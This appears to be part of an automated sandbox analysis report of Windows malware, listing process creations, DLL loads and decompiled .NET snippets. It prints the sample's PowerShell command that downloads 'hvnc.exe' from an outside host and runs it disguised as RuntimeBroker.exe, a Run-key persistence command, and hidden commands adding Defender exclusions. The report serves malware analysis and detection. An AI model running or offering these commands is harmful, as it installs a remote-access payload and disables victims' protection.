            Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"
            Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe"
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String'
            Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
            Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
            Source: C:\Windows\System32\cacls.exe	Section loaded: ntmarta.dll
            Source: C:\Windows\System32\cacls.exe	Section loaded: ntmarta.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: secur32.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

            Data Obfuscation

            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, CQvMD0daJJ1yJw1vJfR.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
